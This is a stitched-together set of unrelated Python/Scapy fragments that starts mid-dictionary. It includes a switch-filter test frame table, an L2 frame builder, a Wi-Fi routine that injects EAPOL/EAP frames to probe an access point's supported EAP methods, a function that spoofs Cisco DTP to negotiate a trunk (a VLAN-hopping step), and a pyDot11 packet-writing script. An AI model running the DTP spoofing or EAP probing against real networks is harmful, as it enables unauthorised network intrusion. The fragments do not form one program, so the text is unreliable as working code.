0x42, ssap = 0x42, ctrl = 0x03) / Raw('\x00\x01') / Raw('\0' * 41) }, 'dot1x' : { 'mac' : '01:80:c2:00:00:03', 'type' : 0x888e, 'load' : Raw('\0' * 64) }, 'eaps' : { 'mac' : '00:e0:2B:00:00:04', 'load' : LLC() / SNAP(OUI = 0x00E02B, code = 0x00BB) / Raw('\0' * 84) }, 'erps' : { 'mac' : '01:19:a7:00:00:01', 'type' : 0x8902, 'load' : Raw('\x00\x28') / Raw('\0' * 35) }, } def protocol_frame(protocol, source='unicast', vlans = []): """ Create a frame that has the minimum fields to be recognized as a determined protocol. It's not intended to be a valid PDU, only to be seen as one by the switch filter.
def l2_frame_from_to(source, destination, vlans = [], seq = 10, size = 64, pattern = '\0', framing = "Ethernet II"): """ Create a frame using interfaces MACs. @param source Name of the source interface, or source MAC address. It can also be: * 'unicast' to use a random unicast address as source MAC. @param destination Name of the destination interface, or destination MAC address. It can also be: * 'broadcast' to use 'FF:FF:FF:FF:FF:FF' as destination MAC. * 'multicast' to use a random multicast address as destination MAC. * 'unicast' to use a random unicast address as destination MAC. @param vlans [optional] List of VLAN Tags. List can be composed by single integer representing VLAN, or tuple (int, int) for VLAN and prio. Ex: [(100, 3), 20] will add two tags, one with VLAN 100, prio 3 and another with VLAN 20, prio 0. @param seq [optional] Number of sequence @param size [optional] Size of created frame. A padding based on 'pattern' is added to complete the frame until size is reached (counting 4 bytes of FCS) @param pattern [optional] Pattern string used to fill payload. Default is '\0'. * 'random' to fill the payload with random bytes. @param framing [optional] Type of frame: * "Ethernet II" : Ethertype > 1535 and hold information about next layer. * "802.3" : Ethertype <= 1500 represent payload length. Next header is LLC. """ if "eth" in destination: dst_mac = mac_address(destination) elif destination == 'broadcast': dst_mac = 'FF:FF:FF:FF:FF:FF' elif destination == 'multicast': dst_mac = str(random_mac('multicast')) elif destination == 'unicast': dst_mac = str(random_mac('unicast')) else: dst_mac = str(destination) if "eth" in source: src_mac = str(mac_address(source)) elif source == 'unicast': src_mac = str(random_mac('unicast')) else: src_mac = str(source) # When the next layer is Dot1Q, Dot3 will be evaluated as Ether anyway (0x8100 > 1536), # To keep consistency between creation and dissection, already use Ether even for 802.3 framing. # The difference will be made as Dot1Q will be followed by LLC header. if framing == "Ethernet II" or vlans: frame = Ether(src = src_mac, dst = dst_mac) elif framing == "802.3": frame = Dot3(src = src_mac, dst = dst_mac) else: raise ValueError("Excpected only 'Ethernet II' or '802.3' as framing types.") for v in vlans: if type(v) == int: frame = frame / Dot1Q(vlan = v) elif type(v) == tuple: frame = frame / Dot1Q(vlan = v[0], prio = v[1]) else: raise TypeError("Expected list with int or tuple for VLANs parameter.") if framing == "802.3": frame = frame / LLC() / SNAP() if seq != None: frame = frame / L2T(l2t_seq = seq) return add_payload(frame, size, pattern)
def check_eap_type(self, eaptype, outer_identity='user', eapol_start=False): """ Check that an eaptype is supported. errDict = { 0:"supported", 1:"not supported", 2:"could not determine", 3:"identity rejected" } """ eapid = randint(1, 254) if eapol_start: eapol_start_request = RadioTap() / Dot11( FCfield=0x01, addr1=self.bssid, addr2=self.source_mac, addr3=self.bssid, SC=self.__unfuckupSC__(), type=2, subtype=8) / Dot11QoS() / LLC( dsap=170, ssap=170, ctrl=3) / SNAP(code=0x888e) / EAPOL( version=1, type=1) self.sequence += 1 i = 0 while i < 3: sendp(eapol_start_request, iface=self.interface, verbose=False) sniff(iface=self.interface, store=0, timeout=RESPONSE_TIMEOUT, stop_filter=self.__stopfilter__) if not self.lastpacket is None: if self.lastpacket.haslayer('EAP'): fields = self.lastpacket.getlayer(EAP).fields if 'type' in fields and fields['type'] == 1 and fields[ 'code'] == 1: i = 0 eapid = fields['id'] break i += 1 if i == 2: return 2 eap_identity_response = RadioTap() / Dot11( FCfield=0x01, addr1=self.bssid, addr2=self.source_mac, addr3=self.bssid, SC=self.__unfuckupSC__(), type=2, subtype=8) / Dot11QoS() / LLC(dsap=170, ssap=170, ctrl=3) / SNAP( code=0x888e) / EAPOL(version=1, type=0) / EAP( code=2, type=1, id=eapid, identity=outer_identity) self.sequence += 1 eap_legacy_nak = RadioTap() / Dot11( FCfield=0x01, addr1=self.bssid, addr2=self.source_mac, addr3=self.bssid, SC=self.__unfuckupSC__(), type=2, subtype=8) / Dot11QoS() / LLC(dsap=170, ssap=170, ctrl=3) / SNAP( code=0x888e) / EAPOL(version=1, type=0, len=6) / EAP( code=2, type=3, id=eapid + 1, eap_types=[eaptype]) self.sequence += 1 for i in range(0, 3): sendp(eap_identity_response, iface=self.interface, verbose=False) sniff(iface=self.interface, store=0, timeout=RESPONSE_TIMEOUT, stop_filter=self.__stopfilter__) if not self.lastpacket is None: if self.lastpacket.haslayer('EAP'): fields = self.lastpacket.getlayer(EAP).fields if fields['code'] == 4: # 4 is a failure return 3 if 'type' in fields and fields['type'] == eaptype: return 0 i = 0 break if i == 2: return 2 for i in range(0, 3): sendp(eap_legacy_nak, iface=self.interface, verbose=False) sniff(iface=self.interface, store=0, timeout=RESPONSE_TIMEOUT, stop_filter=self.__stopfilter__) if not self.lastpacket is None: if self.lastpacket.haslayer('EAP'): fields = self.lastpacket.getlayer(EAP).fields if 'type' in fields and fields['type'] == eaptype: return 0 else: return 1 return 2
def negotiate_trunk(iface=conf.iface, mymac="80:00:0b:12:95:fd"): print "Trying to negotiate a trunk on interface %s" % iface stat=DTPStatus() p = Dot3(src=mymac, dst="8C:60:4F:DC:CF:FC")/LLC()/SNAP()/DTP(tlvlist=[DTPDomain(),stat,DTPType(),DTPNeighbor(neighbor=mymac)]) sendp(p) print stat.show()
from scapy.sendrecv import sendp from scapy.layers.inet import IP, ICMP from scapy.all import hexdump from scapy.utils import rdpcap, wrpcap from pyDot11.__init__ import wepEncrypt from pyDot11.lib.utils import Pcap from pyDot11.lib.wep import Wep #Sending from a pcap #wepPkts = rdpcap('PCAPs/ICMPs/wep_pings.pcap') #wepPkts.summary() #input = wepPkts.__class__(str(wepPkts)[0:-4]) #print(input.summary()) #sendp(wepPkts) # Sending a simple packet sender = '08:00:27:c6:e4:20' dest = '08:00:27:1b:8b:a3' packet = Dot11(addr1=dest, addr2=sender, addr3=sender) / LLC() / SNAP() / IP( src="192.168.3.7", dst="192.168.3.5") / ICMP() / "Hello!" print(packet.summary()) for x in range(19): wrpcap('dot11-ICMP.pcap', packet, append=True) #print(packet.show()) #sendp(packet) #encPkt = wepEncrypt(packet,'0123456789') #print(encPkt.summary()) #print(encPkt.show()) #sendp(encPkt)